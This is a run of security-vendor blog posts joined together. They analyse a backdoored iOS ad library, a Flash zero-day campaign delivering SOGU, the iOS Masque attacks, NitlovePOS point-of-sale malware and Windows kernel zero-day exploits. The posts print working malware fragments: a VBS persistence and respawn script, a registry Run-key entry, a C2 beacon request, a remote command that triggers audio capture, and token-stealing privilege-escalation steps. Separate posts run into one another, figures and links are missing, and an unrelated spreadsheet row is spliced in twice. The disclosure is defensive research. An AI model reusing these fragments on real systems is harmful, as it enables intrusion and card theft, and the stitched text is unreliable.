Figure 6 shows a code snippet for initializing the app’s keychain before reading. The accessed keychain is in the kSecClassGenericPassword class, which is widely used by apps for storing secret credentials such as passwords.



Figure 6: Reading the keychain in the kSecClassGenericPassword class.

Remote control in msageJS

msageJS contains JavaScript code for communicating with a C2 server and submitting commands to msageCore. The file layout of msageJS is shown in Figure 7. Inside sdkjs.js, we find a wrapper object called adsage and the JavaScript interface for command execution.



Figure 7: The file layout of msageJS


The command execution interface is constructed as follows:


          adsage.exec(className, methodName, argsList, onSuccess, onFailure);


The className and methodName parameters correspond to classes and methods in msageCore. The argsList parameter can be either a list or dict, and the exact types and values can be determined by reversing the methods in msageCore. The final two parameters are function callbacks invoked when the method exits. For example, the following invocation starts audio capture:


adsage.exec("MSageCoreUIManager", "captureAudio", ["Hey", 10, 40],  onSuccess, onFailure);


Note that the files comprising msageJS cannot be found by simply listing the files in an affected app’s IPA. The files themselves are zipped and encoded in Base64 in the data section of the ad library binary. After an affected app is launched, msageCore first decodes the string and extracts msageJS to the app’s data container, setting index.html shown in Figure 7 as the landing page in the ad library WebView to launch msageJS.



Figure 8: Base64 encoded JavaScript component in zip format.


When msageJS is launched, it sends a POST request to hxxp:// to check for updates. The server responds with information about the latest msageJS version, including a download URL, as shown in Figure 9. Note that since the request uses HTTP rather than HTTPS, the response can be hijacked easily by a network attacker, who could replace the download URL with a link to malicious JavaScript code that triggers the backdoors.


Figure 9: Server response to msageJS update request via HTTP POST


In this blog, we described a high-risk ad library affecting thousands of iOS apps in the Apple App Store. We revealed the internals of backdoors which can be used to silently record audio, capture screenshots, prompt the user to side-load other high-risk apps, and read sensitive data from the app’s keychain, among other dubious capabilities. We also showed how these backdoors can be controlled remotely by JavaScript code fetched from the Internet in an insecure manner.


FireEye Protection

Immediately after we discovered the high-risk ad library and affected apps, FireEye updated detection rules in its NX and Mobile Threat Prevention (MTP) products to detect the affected apps and their network activities. In addition, FireEye customers can access the full list of affected apps upon request.

FireEye NX customers are alerted if an employee uses an infected app while their iOS device is connected to the corporate network. It is important to note that, even if the servers that the backdoored mobiSage SDK communicates with do not deliver JavaScript code that triggers the high-risk backdoors, the affected apps still try to connect to them using HTTP. This HTTP session is vulnerable to hijacking by outside attackers.

FireEye MTP management customers have full visibility into high-risk apps installed on mobile devices in their deployment base. End users receive on-device notifications of the detection and IT administrators receive email alerts.

Click here to learn more about FireEye Mobile Threat Protection product.






[3] [4]









2015 FLARE-ON Challenge Solutions

The first few challenges narrowed the playing field drastically, with most serious contestants holding firm through challenges 4-9. The last two increased the difficulty level and proved a difficult final series of challenges for a well-earned finish line.

The FLARE On Challenge always reaches a very wide international audience. Outside of the USA, this year’s country with the most finishers was China, with and impressive 11 winners. I hope that massive shipment of belt buckles doesn’t get caught up in customs! The performance of contestants from Vietnam and Slovakia were also particularly commendable, as both held early leads in total finishers. Based on the locations we are sending the challenge prizes to (people who responded with their shipping info by noon today) we can say that 33 countries had finishers this year. This next graphs shows the total winners by country this year.

And without further ado, here are the solutions for this year’s challenges, each written by their respective challenge creator.












We hope you had fun and learned something new about reverse engineering! Stay tuned for the third FLARE On Challenge coming in 2016!

Second Adobe Flash Zero-Day CVE-2015-5122 from HackingTeam Exploited in Strategic Web Compromise Targeting Japanese Victims

On July 14, FireEye researchers discovered attacks exploiting the Adobe Flash vulnerability CVE-2015-5122, just four days after Adobe released a patch. CVE-2015-5122 was the second Adobe Flash zero-day revealed in the leak of HackingTeam’s internal data. The campaign targeted Japanese organizations by using at least two legitimate Japanese websites to host a strategic web compromise (SWC), where victims ultimately downloaded a variant of the SOGU malware.

Strategic Web Compromise

At least two different Japanese websites were compromised to host the exploit framework and malicious downloads:

  • Japan’s International Hospitality and Conference Service Association (IHCSA) website (hxxp://www.ihcsa[.]or[.]jp) in Figure 1

    Figure 1: IHCSA website

  • Japan’s Cosmetech Inc. website (hxxp://cosmetech[.]co[.]jp)

The main landing page for the attacks is a specific URL seeded on the IHCSA website (hxxp://www.ihcsa[.]or[.]jp/zaigaikoukan/zaigaikoukansencho-1/), where users are redirected to the HackingTeam Adobe Flash framework hosted on the second compromised Japanese website. We observed in the past week this same basic framework across several different SWCs exploiting the “older” CVE-2015-5119 Adobe Flash vulnerability in Figure 2.

    Figure 2: First portion of exploit chain

The webpage (hxxp://cosmetech[.]co[.]jp/css/movie.html) is built with the open source framework Adobe Flex and checks if the user has at least Adobe Flash Player version 11.4.0 installed. If the victim has the correct version of Flash, the user is directed to run a different, more in-depth profiling script (hxxp://, which checks for several more conditions in addition to their version of Flash. If the conditions are not met then the script will not attempt to load the Adobe Flash (SWF) file into the user’s browser. In at least two of the incidents we observed, the victims were running Internet Explorer 11 on Windows 7 machines.

The final component is delivering a malicious SWF file, which we confirmed exploits CVE-2015-5122 on Adobe Version for Windows in Figure 3.

    Figure 3: Malicious SWF download

SOGU Malware, Possible New Variant

After successful exploitation, the SWF file dropped a SOGU variant—a backdoor widely used by Chinese threat groups and also known as “Kaba”—in a temporary directory under “AppData\Local\”. The directory contains the properties and configuration in Figure 4.

    Filename: Rdws.exe

    Size: 413696 bytes

    MD5: 5a22e5aee4da2fe363b77f1351265a00

    Compile Time: 2015-07-13 08:11:01

    SHA256: df5f1b802d553cddd3b99d1901a87d0d1f42431b366cfb0ed25f465285e38d27


    Import Hash: ae984e4ab41d192d631d4f923d9210e4

    PEHash: 57e6b26eac0f34714252957d26287bc93ef07db2

    .text: e683e1f9fb674f97cf4420d15dc09a2b

    .rdata: 3a92b98a74d7ffb095fe70cf8acacc75

    .data: b5d4f68badfd6e3454f8ad29da54481f

    .rsrc: 474f9723420a3f2d0512b99932a50ca7

    C2 Password: gogogod<

    Memo: 201507122359

    Process Inject Targets: %windir%\system32\svchost.exe

    Sogu Config Encoder: sogu_20140307

    Mutex Name: ZucFCoeHa8KvZcj1FO838HN&*wz4xSdmm1

    Figure 4: SOGU Binary ‘Rdws.exe’

The compile timestamp indicates the malware was assembled on July 13, less than a day before we observed the SWC. We believe the time stamp in this case is likely genuine, based on the time line of the incident. The SOGU binary also appears to masquerade as a legitimate Trend Micro file named “VizorHtmlDialog.exe” in Figure 5.

    LegalCopyright: Copyright (C) 2009-2010 Trend Micro Incorporated. All rights reserved.

    InternalName: VizorHtmlDialog


    CompanyName: Trend Micro Inc.

    PrivateBuild: Build 1303 - 8/8/2010

    LegalTrademarks: Trend Micro Titanium is a registered trademark of Trend Micro Incorporated.


    ProductName: Trend Micro Titanium

    SpecialBuild: 1303

    ProductVersion: 3.0

    FileDescription: Trend Titanium

    OriginalFilename: VizorHtmlDialog.exe

    Figure 5: Rdws.exe version information

The threat group likely used Trend Micro, a security software company headquartered in Japan, as the basis for the fake file version information deliberately, given the focus of this campaign on Japanese organizations.

SOGU Command and Control

The SOGU variant calls out to a previously unobserved command and control (CnC) domain, “amxil[.]opmuert[.]org” over port 443 in Figure 6. It uses modified DNS TXT record beaconing with an encoding we have not previously observed with SOGU malware, along with a non-standard header, indicating that this is possibly a new variant.

    Figure 6: SOGU C2 beaconing

The WHOIS registrant email address for the domain did not indicate any prior malicious activity, and the current IP resolution ( is for an Amazon Web Services IP address.

Another Quick Turnaround on Leveraging HackingTeam Zero-Days

Similar to the short turnaround time highlighted in our blog on the recent APT3/APT18 phishing attacks, the threat actor quickly employed the leaked zero-day vulnerability into a SWC campaign. The threat group appears to have used procured and compromised infrastructure to target Japanese organizations. In two days we have observed at least two victims related to this attack.

We cannot confirm how the organizations were targeted, though similar incidents involving SWC and exploitation of the Flash vulnerability CVE-2015-5119 lured victims with phishing emails. Additionally, the limited popularity of the niche site also contributes to our suspicion that phishing emails may have been the lure, and not incidental web browsing.

Malware Overlap with Other Chinese Threat Groups

We believe that this is a concerted campaign against Japanese companies given the nature of the SWC. The use of SOGU malware and dissemination method is consistent with the tactics of Chinese APT groups that we track. Chinese APT groups have previously targeted the affected Japanese organizations, but we have yet to confirm which group is responsible for this campaign.

Why Japan?

In this case, we do not have enough information to discern specifically what the threat actors may have been pursuing. The Japanese economy’s technological innovation and strengths in high-tech and precision goods have attracted the interest of multiple Chinese APT groups, who almost certainly view Japanese companies as a rich source of intellectual property and competitive intelligence. The Japanese government and military organizations are also frequent targets of cyber espionage.[1]  Japan’s economic influence, alliance with the United States, regional disputes, and evolving defense policies make the Japanese government a dedicated target of foreign intelligence.


FireEye maintains endpoint and network detection for CVE-2015-5122 and the backdoor used in this campaign. FireEye products and services identify this activity as SOGU/Kaba within the user interface. Additionally, we highly recommend:

  • Applying Adobe’s newest patch for Flash immediately;
  • Querying for additional activity by the indicators from the compromised Japanese websites and the SOGU malware callbacks;
  • Blocking CnC addresses via outbound communications; and
  • Scope the environment to prepare for incident response.


    [1] Humber, Yuriy and Gearoid Reidy. “Yahoo Hacks Highlight Cyber Flaws Japan Rushing to Twart.” BloombergBusiness. 8 July 2014.

    Japanese Ministry of Defense. “Trends Concerning Cyber Space.” Defense of Japan 2014.

    LAC Corporation. “Cyber Grid View, Vol. 1.”

    Otake, Tomoko. “Japan Pension Service hack used classic attack method.” Japan Times. 2 June 2015.


Three New Masque Attacks against iOS: Demolishing, Breaking and Hijacking

In the recent release of iOS 8.4, Apple fixed several vulnerabilities including vulnerabilities that allow attackers to deploy two new kinds of Masque Attack (CVE-2015-3722/3725, and CVE-2015-3725). We call these exploits Manifest Masque and Extension Masque, which can be used to demolish apps, including system apps (e.g., Apple Watch, Health, Pay and so on), and to break the app data container. In this blog, we also disclose the details of a previously fixed, but undisclosed, masque vulnerability: Plugin Masque, which bypasses iOS entitlement enforcement and hijacks VPN traffic. Our investigation also shows that around one third of iOS devices still have not updated to versions 8.1.3 or above, even 5 months after the release of 8.1.3, and these devices are still vulnerable to all the Masque Attacks.

We have disclosed five kinds of Masque Attacks, as shown in the following table.


Consequences disclosed till now

Mitigation status

App Masque

* Replace an existing app

* Harvest sensitive data

Fixed in iOS 8.1.3 [6]

URL Masque

* Bypass prompt of trust

* Hijack inter-app communication

Partially fixed in iOS 8.1.3 [11]

Manifest Masque

* Demolish other apps (incl. Apple Watch, Health, Pay, etc.) during over-the-air installations

Partially fixed in iOS 8.4

Plugin Masque

* Bypass prompt of trust

* Bypass VPN plugin entitlement

* Replace an existing VPN plugin

* Hijack device traffic

* Prevent device from rebooting

* Exploit more kernel vulnerabilities

Fixed in iOS 8.1.3

Extension Masque

* Access another app’s data

* Or prevent another app to access its own data

Partially fixed in iOS 8.4

Manifest Masque Attack leverages the CVE-2015-3722/3725 vulnerability to demolish an existing app on iOS when a victim installs an in-house iOS app wirelessly using enterprise provisioning from a website. The demolished app (the attack target) can be either a regular app downloaded from official App Store or even an important system app, such as Apple Watch, Apple Pay, App Store, Safari, Settings, etc. This vulnerability affects all iOS 7.x and iOS 8.x versions prior to iOS 8.4. We first notified Apple of this vulnerability in August 2014.

Extension Masque Attack can break the restrictions of app data container. A malicious app extension installed along with an in-house app on iOS 8 can either gain full access to a targeted app’s data container or prevent the targeted app from accessing its own data container. On June 14, security researchers Luyi, Xiaofeng et al. disclosed several severe issues on OS X, including a similar issue with this one [5]. They did remarkable research, but happened to miss this on iOS. Their report claimed: “this security risk is not present on iOS”. However, the data container issue does affect all iOS 8.x versions prior to iOS 8.4, and can be leveraged by an attacker to steal all data in a target app’s data container. We independently discovered this vulnerability on iOS and notified Apple before the report [5] was published, and Apple fixed this issue as part of CVE-2015-3725.

In addition to these two vulnerabilities patched on iOS 8.4, we also disclose the detail of another untrusted code injection attack by replacing the VPN Plugin, the Plugin Masque Attack. We reported this vulnerability to Apple in Nov 2014, and Apple fixed the vulnerability on iOS 8.1.3 when Apple patched the original Masque Attack (App Masque) [6, 11]. However, this exploit is even more severe than the original Masque Attack. The malicious code can be injected to the neagent process and can perform privileged operations, such as monitoring all VPN traffic, without the user’s awareness. We first demonstrated this attack in the Jailbreak Security Summit [7] in April 2015. Here we categorize this attack as Plugin Masque Attack.

We will discuss the technical details and demonstrate these three kinds of Masque Attacks.

Manifest Masque: Putting On the New, Taking Off the Old

To distribute an in-house iOS app with enterprise provisioning wirelessly, one has to publish a web page containing a hyperlink that redirects to a XML manifest file hosted on an https server [1]. The XML manifest file contains metadata of the in-house app, including its bundle identifier, bundle version and the download URL of the .ipa file, as shown in Table 1. When installing the in-house iOS app wirelessly, iOS downloads this manifest file first and parse the metadata for the installation process.

<a href="itms-services://?action=downloadmanifest&url= plist">Install App</a>
















              … Entries For Another App




Table 1. An example of the hyperlink and the manifest file

According to Apple’s official document [1], the bundle-identifier field should be “Your app’s bundle identifier, exactly as specified in your Xcode project”. However, we have discovered that iOS doesn’t verify the consistency between the bundle identifier in the XML manifest file on the website and the bundle identifier within the app itself. If the XML manifest file on the website has a bundle identifier equivalent to that of another genuine app on the device, and the bundle-version in the manifest is higher than the genuine app’s version, the genuine app will be demolished down to a dummy placeholder, whereas the in-house app will still be installed using its built-in bundle id. The dummy placeholder will disappear after the victim restarts the device. Also, as shown in Table 1, a manifest file can contain different apps’ metadata entries to distribute multiple apps at a time, which means this vulnerability can cause multiple apps being demolished with just one click by the victim.

By leveraging this vulnerability, one app developer can install his/her own app and demolish other apps (e.g. a competitor’s app) at the same time. In this way, attackers can perform DoS attacks or phishing attacks on iOS.

Figure 1. Phishing Attack by installing “malicious Chrome” and demolishing the genuine one

Figure 1 shows an example of the phishing attack. When the user clicks a URL in the Gmail app, this URL is rewritten with the “googlechrome-x-callback://” scheme and supposed to be handled by Chrome on the device. However, an attacker can leverage the Manifest Masque vulnerability to demolish the genuine Chrome and install “malicious Chrome” registering the same scheme. Other than requiring the same bundle identifier to replace a genuine app in the original Masque Attack [xx], the malicious chrome in this phishing attack uses a different bundle identifier to bypass the installer’s bundle identifier validation. Later, when the victim clicks a URL in the Gmail app, the malicious Chrome can take over the rewritten URL scheme and perform more sophisticated attacks.

What’s worse, an attacker can also exploit this vulnerability to demolish all system apps (e.g. Apple Watch, Apple Pay UIService, App Store, Safari, Health, InCallService, Settings, etc.). Once demolished, these system apps will no longer be available to the victim, even if the victim restarts the device.

Here we demonstrate this DoS attack on iOS 8.3 to demolish all the system apps and one App Store app (i.e. Gmail) when the victim clicks only once to install an in-house app wirelessly. Note that after rebooting the device, all the system apps still remain demolished while the App Store app would disappear since it has already been uninstalled.

June 2 6/12/2015 Consulting Thought Leadership “Proactively Engaged – Questions Executives Should Ask Their Security Teams ” “-Many breaches occur as a result of executive decisions made w/out full knowledge of the people/processes needed to prevent them; -Offers specific questions that execs should ask to understand and prevent a breach” Jim Aldridge Kyrk Content Finalized Global June 2 6/12/2015 Consulting Thought Leadership “Proactively Engaged – Questions Executives Should Ask Their Security Teams ” “-Many breaches occur as a result of executive decisions made w/out full knowledge of the people/processes needed to prevent them; -Offers specific questions that execs should ask to understand and prevent a breach” Jim Aldridge Kyrk Content Finalized GlobCaching Out: The Value of Shimcache for Investigators

NitlovePOS: Another New POS Malware

There has been a proliferation of malware specifically designed to extract payment card information from Point-of-Sale (POS) systems over the last two years. In 2015, there have already been a variety of new POS malware identified including a new Alina variant, FighterPOS and Punkey. During our research into a widespread spam campaign, we discovered yet another POS malware that we’ve named NitlovePOS.

The NitlovePOS malware can capture and ex-filtrate track one and track two payment card data by scanning the running processes of a compromised machine. It then sends this data to a webserver using SSL.

We believe the cybercriminals assess the hosts compromised via indiscriminate spam campaigns and instruct specific victims to download the POS malware.


We have been monitoring an indiscriminate spam campaign that started on Wednesday, May 20, 2015.  The spam emails referred to possible employment opportunities and purported to have a resume attached. The “From” email addresses were spoofed Yahoo! Mail accounts and contained the following “Subject” lines:

    Subject: Any Jobs?

    Subject: Any openings?

    Subject: Internship

    Subject: Internship questions

    Subject: Internships?

    Subject: Job Posting

    Subject: Job questions

    Subject: My Resume

    Subject: Openings?

The email came with an attachment named CV_[4 numbers].doc or My_Resume_[4 numbers].doc, which is embedded with a malicious macro. To trick the recipient into enabling the malicious macro, the document claims to be a “protected document.”

If enabled, the malicious macro will download and execute a malicious executable from The cybercriminals behind this operation have been updating the payload. So far, we have observed:

    e6531d4c246ecf82a2fd959003d76cca  dro.exe

    600e5df303765ff73dccff1c3e37c03a  dro.exe

These payloads beacon to the same server from which they are downloaded and receive instructions to download additional malware hosted on this server. This server contains a wide variety of malware:

    6545d2528460884b24bf6d53b721bf9e  5dro.exe

    e339fce54e2ff6e9bd3a5c9fe6a214ea  AndroSpread.exe

    9e208e9d516f27fd95e8d165bd7911e8  AndroSpread.exe

    abc69e0d444536e41016754cfee3ff90  dr2o.exe

    e6531d4c246ecf82a2fd959003d76cca  dro.exe

    600e5df303765ff73dccff1c3e37c03a  dro.exe

    c8b0769eb21bb103b8fbda8ddaea2806  jews2.exe

    4d877072fd81b5b18c2c585f5a58a56e  load33.exe

    9c6398de0101e6b3811cf35de6fc7b79  load.exe

    ac8358ce51bbc7f7515e656316e23f8d  Pony.exe

    3309274e139157762b5708998d00cee0  Pony.exe

    b3962f61a4819593233aa5893421c4d1  pos.exe

    6cdd93dcb1c54a4e2b036d2e13b51216  pos.exe

We focused on the “pos.exe” malware and suspected that it maybe targeted Point of Sale machines. We speculate that once the attackers have identified a potentially interesting host form among their victims, they can then instruct the victim to download the POS malware. While we have observed many downloads of the various EXE’s hosed on that server, we have only observed three downloads of “pos.exe”.

Technical Analysis

We analyzed the “pos.exe” (6cdd93dcb1c54a4e2b036d2e13b51216) binary found on the server. (A new version of “pos.exe” (b3962f61a4819593233aa5893421c4d1) was uploaded on May 22, 2015 that has exactly the same malicious behavior but with different file structure.)

The binary itself is named “TAPIBrowser” and was created on May 20, 2015.

    File Name                       : pos.exe

    File Size                       : 141 kB

    MD5: 6cdd93dcb1c54a4e2b036d2e13b51216

    File Type                       : Win32 EXE

    Machine Type                    : Intel 386 or later, and compatibles

    Time Stamp                      : 2015:05:20 09:02:54-07:00

    PE Type                         : PE32

    File Description                : TAPIBrowser MFC Application

    File Version                    : 1, 0, 0, 1

    Internal Name                   : TAPIBrowser

    Legal Copyright                 : Copyright (C) 2000

    Legal Trademarks                :

    Original Filename               : TAPIBrowser.EXE

    Private Build                   :

    Product Name                    : TAPIBrowser Application

    Product Version                 : 1, 0, 0, 1:

The structure of the file is awkward; it only contains three sections: .rdata, .hidata and .rsrc and the entry point located inside .hidata:

When executed, it will copy itself to disk using a well-known hiding technique via NTFS Alternate Data Streams (ADS) as:

    ~\Local Settings\Temp:defrag.scr

Then will create a vbs script and save it to disk, again using ADS:

    ~\Local Settings\Temp:defrag.vbs

By doing this, the files are not visible in the file system and therefore are more difficult to locate and detect.

Once the malware is running, the “defrag.vbs” script monitors for attempts to delete the malicious process via InstanceDeletion Event; it will re-spawn the malware if the process is terminated. Here is the code contained within “defrag.vbs”:

Set f=CreateObject("Scripting.FileSystemObject")

Set W=CreateObject("WScript.Shell")

Do While                      

GetObject("winmgmts:Win32_Process").Create(W.ExpandEnvironmentStrings("""%TMP%:Defrag.scr""     -"),n,n,p)=0

GetObject("winmgmts:\\.\root\cimv2").ExecNotificationQuery("Select * From __InstanceDeletionEvent Within 1 Where TargetInstance ISA 'Win32_Process' AND TargetInstance.ProcessID="&p).NextEvent


W.Run(W.ExpandEnvironmentStrings("cmd /C /D type nul > %TMP%:Defrag.scr")), 0, true

Exit Do

End If


The malware ensures that it will run after every reboot by adding itself to the Run registry key:

    \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\"Defrag" = wscript "C:\Users\ADMINI~1\AppData\Local\Temp:defrag.vbs"

NitlovePOS expects to be run with the “-“ sign as argument; otherwise it won’t perform any malicious actions. This technique can help bypass some methods of detection, particularly those that leverage automation. Here is an example of how the malware is executed:

    \LOCALS~1\Temp:Defrag.scr" -

If the right argument is provided, NitlovePOS will decode itself in memory and start searching for payment card data. If it is not successful, NitlovePOS will sleep for five minutes and restart the searching effort.

NitlovePOS has three main threads:

    Thread 1:  SSL C2 Communications

    Thread 2: MailSlot monitoring waiting for CC.

    Thread 3: Memory Scrapping

Thread 1:  C2 Communications

NitlovePOS is configured to connect to one of three hardcoded C2 servers:




All three of these domains resolve to the same IP address: This IP address is assigned to a network located in St. Petersburg, Russia.

As soon as NitlovePOS starts running on the compromised system, it will initiate a callback via SSL:

    POST /derpos/gateway.php HTTP/1.1

    User-Agent: nit_love<GUID>


    Content-Length: 41

    Connection: Keep-Alive

    Cache-Control: no-cache

    Pragma: no-cache



    <computer name>

    <OS Version>


The User-Agent header contains a hardcoded string “nit_love” and the Machine GUID, which is not necessarily unique but can be used as an identifier by the cybercriminals. The string “HWAWAWAWA” is hardcoded and may be a unique campaign identifier; the “F.r.” is calculated per infected host.

Thread 2: MailSlot monitoring waiting for payment card data

A mailslot is basically a shared range of memory that can be used to store data; the process creating the mailslot acts as the server and the clients can be other hosts on the same network, local processes on the machine, or local threads in the same process.

NitlovePOS uses this feature to store payment card information; the mailslot name that is created comes as a hardcoded string in the binary (once de-obfuscated);


Once the mailslot is created, an infinite loop will keep querying the allocated space.

Thread 3: Memory Scrapping

NitlovePOS scans running processes for payment data and but will skip System and “System Idle Process.” It will try to match track 1 or track 2 data and, if found, will write the data into the mailslot created by Thread 2. This information is then sent via POST it to the C2 using SSL, which makes network-level detection more difficult.

Possible Control Panel

During our research we observed what appears to be a test control panel on a different, but probably related, server that matches with NitlovePOS. This panel is called “nitbot,” which is similar to the “nit_love” string found in the binary and was located in a directory called “derpmo” which is similar to the “derpos” used in this case.


The information contained in the NitlovePOS beacon matches the fields that are displayed in the Nitbot control panel. These include the machines GIUD that is transmitted in the User-Agent header as well as an identifier “HWAWAWAWA,” which aligns with the “group name” that can be used by the cybercriminals to track various campaigns.

The control panel contains a view that lists the “tracks,” or stolen payment card data. This indicates that this panel is for malware capable of stealing data from POS machines that matches up with the capability of the NitlovePOS malware.


Even cybercriminals engaged in indiscriminate spam operations have POS malware available and can deploy it to s subset of their victims. Due to the widespread use of POS malware, they are eventually discovered and detection increases. However, this is followed by the development of new POS with very similar functionality. Despite the similarity, the detection levels for new variants are initially quite low. This gives the cybercriminals a window of opportunity to exploit the use of a new variant.

We expect that new versions of functionally similar POS malware will continue to emerge to meet the demand of the cybercrime marketplace.

iOS Masque Attack Revived: Bypassing Prompt for Trust and App URL Scheme Hijacking

In November of last year, we uncovered a major flaw in iOS we dubbed “Masque Attack” that allowed for malicious apps to replace existing, legitimate ones on an iOS device via SMS, email, or web browsing. In total, we have notified Apple of five security issues related to four kinds of Masque Attacks. Today, we are sharing Masque Attack II in the series – part of which has been fixed in the recent iOS 8.1.3 security content update [2].

Masque Attack II includes bypassing iOS prompt for trust and iOS URL scheme hijacking. iOS 8.1.3 fixed the first part whereas the iOS URL scheme hijacking is still present.

iOS app URL scheme “lets you communicate with other apps through a protocol that you define.” [1] By deliberately defining the same URL schemes used by other apps, a malicious app can still hijack the communications towards those apps and mount phishing attacks to steal login credentials. Even worse than the first Masque Attack [3], attackers might be able to conduct Masque Attack II through an app in the App Store. We describe these two parts of Masque Attack II in the following sections.

Bypassing Prompt for Trust

When the user clicks to open an enterprise-signed app for the first time, iOS asks whether the user trusts the signing party. The app won’t launch unless the user chooses “Trust”.  Apple suggested defending against Masque Attack by the aid of this “Don’t Trust” prompt [8]. We notified Apple that this was inadequate.

We find that when calling an iOS URL scheme, iOS launches the enterprise-signed app registered to handle the URL scheme without prompting for trust. It doesn’t matter whether the user has launched that enterprise-signed app before. Even if the user has always clicked “Don’t Trust”, iOS still launches that enterprise-signed app directly upon calling its URL scheme. In other words, when the user clicks on a link in SMS, iOS Mail or Google Inbox, iOS launches the target enterprise-signed app without asking for user’s “Trust” or even ignores user’s “Don’t Trust”. An attacker can leverage this issue to launch an app containing a Masque Attack.

By crafting and distributing an enterprise-signed malware that registers app URL schemes identical to the ones used by legitimate popular apps, an attacker may hijack legitimate apps’ URL schemes and mimic their UI to carry out phishing attacks, e.g. stealing the login credentials. iOS doesn’t protect users from this attack because it doesn’t prompt for trust to the user when launching such an enterprise-signed malware for the first time through app URL scheme. In Demo Video 1, we explain this issue with concrete examples.

We’ve also found other approaches to bypass “Don’t Trust” protection through iOS springboard. We confirmed these problems on iOS 7.1.2, 8.1.1, 8.1.2 and 8.2 beta. Recently Apple fixed these issues and acknowledged our findings in CVE-2014-4494 in the iOS 8.1.3 security content [2]. As measured by the App Store on 2 Feb 2015 [4], however, 28% devices use iOS version 7 or lower, which are still vulnerable. Of the 72% iOS 8 devices, some are also vulnerable given that iOS 8.1.3 came out in late January 2015. We encourage users to upgrade their iOS devices to the latest version as soon as possible.

Two Limited, Targeted Attacks; Two New Zero-Days

The FireEye Labs team has identified two new zero-day vulnerabilities as part of limited, targeted attacks against some major corporations. Both zero-days exploit the Windows Kernel, with Microsoft assigning CVE-2014-4148 and CVE-2014-4113 to and addressing the vulnerabilities in their October 2014 Security Bulletin.

FireEye Labs have identified 16 total zero-day attacks in the last two years – uncovering 11 in 2013 and five in 2014 so far.

Microsoft commented: “On October 14, 2014, Microsoft released MS14-058 to fully address these vulnerabilities and help protect customers. We appreciate FireEye Labs using Coordinated Vulnerability Disclosure to assist us in working toward a fix in a collaborative manner that helps keep customers safe.”

In the case of CVE-2014-4148, the attackers exploited a vulnerability in the Microsoft Windows TrueType Font (TTF) processing subsystem, using a Microsoft Office document to embed and deliver a malicious TTF to an international organization. Since the embedded TTF is processed in kernel-mode, successful exploitation granted the attackers kernel-mode access. Though the TTF is delivered in a Microsoft Office document, the vulnerability does not reside within Microsoft Office.

CVE-2014-4148 impacted both 32-bit and 64-bit Windows operating systems shown in MS14-058, though the attacks only targeted 32-bit systems. The malware contained within the exploit has specific functions adapted to the following operating system platform categories:

  • Windows 8.1/Windows Server 2012 R2
  • Windows 8/Windows Server 2012
  • Windows 7/Windows Server 2008 R2 (Service Pack 0 and 1)
  • Windows XP Service Pack 3

CVE-2014-4113 rendered Microsoft Windows 7, Vista, XP, Windows 2000, Windows Server 2003/R2, and Windows Server 2008/R2 vulnerable to a local Elevation of Privilege (EoP) attack. This means that the vulnerability cannot be used on its own to compromise a customer’s security. An attacker would first need to gain access to a remote system running any of the above operating systems before they could execute code within the context of the Windows Kernel. Investigation by FireEye Labs has revealed evidence that attackers have likely used variations of these exploits for a while. Windows 8 and Windows Server 2012 and later do not have these same vulnerabilities.

Information on the companies affected, as well as threat actors, is not available at this time. We have no evidence of these exploits being used by the same actors. Instead, we have only observed each exploit being used separately, in unrelated attacks.


About CVE-2014-4148





Microsoft has released security update MS14-058 that addresses CVE-2014-4148.

Since TTF exploits target the underlying operating system, the vulnerability can be exploited through multiple attack vectors, including web pages. In the past, exploit kit authors have converted a similar exploit (CVE-2011-3402) for use in browser-based attacks. More information about this scenario is available under Microsoft’s response to CVE-2011-3402: MS11-087.




This TTF exploit is packaged within a Microsoft Office file. Upon opening the file, the font will exploit a vulnerability in the Windows TTF subsystem located within the win32k.sys kernel-mode driver.

The attacker’s shellcode resides within the Font Program (fpgm) section of the TTF. The font program begins with a short sequence of instructions that quickly return. The remainder of the font program section is treated as unreachable code for the purposes of the font program and is ignored when initially parsing the font.

During exploitation, the attacker’s shellcode uses Asynchronous Procedure Calls (APC) to inject the second stage from kernel-mode into the user-mode process winlogon.exe (in XP) or lsass.exe (in other OSes). From the injected process, the attacker writes and executes a third stage (executable).

The third stage decodes an embedded DLL to, and runs it from, memory. This DLL is a full-featured remote access tool that connects back to the attacker.

Plenty of evidence supports the attacker’s high level of sophistication. Beyond the fact that the attack is zero-day kernel-level exploit, the attack also showed the following:

  • a usable hard-coded area of kernel memory is used like a mutex to avoid running the shellcode multiple times
  • the exploit has an expiration date: if the current time is after October 31, 2014, the exploit shellcode will exit silently
  • the shellcode has implementation customizations for four different types of OS platforms/service pack levels, suggesting that testing for multiple OS platforms was conducted
  • the dropped malware individually decodes each string when that string is used to prevent analysis
  • the dropped malware is specifically customized for the targeted environment
  • the dropped remote access capability is full-featured and customized: it does not rely on generally available implementations (like Poison Ivy)
  • the dropped remote access capability is a loader that decrypts the actual DLL remote access capability into memory and never writes the decrypted remote access capability to disk


About CVE-2014-4113





Microsoft has released security update MS14-058 that addresses this vulnerability.


Vulnerability and Exploit Details


The 32-bit exploit triggers an out-of-bounds memory access that dereferences offsets from a high memory address, and inadvertently wraps into the null page. In user-mode, memory dereferences within the null page are generally assumed to be non-exploitable. Since the null page is usually not mapped – the exception being 16-bit legacy applications emulated by ntvdm.exe--null pointer dereferences will simply crash the running process. In contrast, memory dereferences within the null page in the kernel are commonly exploited because the attacker can first map the null page from user-mode, as is the case with this exploits. The steps taken for successful 32-bit exploitation are:



  1. Map the null page:




    1. ntdll!ZwAllocateVirtualMemory(…,BaseAddress=0x1, …)



  2. Build a malformed win32k!tagWND structure at the null page such that it is properly validated in the kernel
  3. Trigger vulnerability
  4. Attacker’s callback in win32k!tagWND.lpfnWndProc executes in kernel-mode




    1. Callback overwrites EPROCESS.Token to elevate privileges



  5. Spawns a child process that inherits the elevated access token


32-bit Windows 8 and later users are not affected by this exploit. The Windows 8 Null Page protection prohibits user-mode processes from mapping the null page and causes the exploits to fail.

In the 64-bit version of the exploit, dereferencing offsets from a high 32-bit memory address do not wrap, as it is well within the addressable memory range for a 64-bit user-mode process. As such, the Null Page protection implemented in Windows versions 7 (after MS13-031) and later does not apply. The steps taken by the 64-bit exploit variants are:



  1. Map memory page:




    1. ntdll!ZwAllocateVirtualMemory(…)



  2. Build a malformed win32k!tagWND structure at the mapped page such that it is properly validated in the kernel
  3. Trigger vulnerability
  4. Attacker’s callback in win32k!tagWND.lpfnWndProc executes in kernel-mode




    1. Callback overwrites EPROCESS.Token to elevate privileges



  5. Spawns a child process that inherits the elevated access token


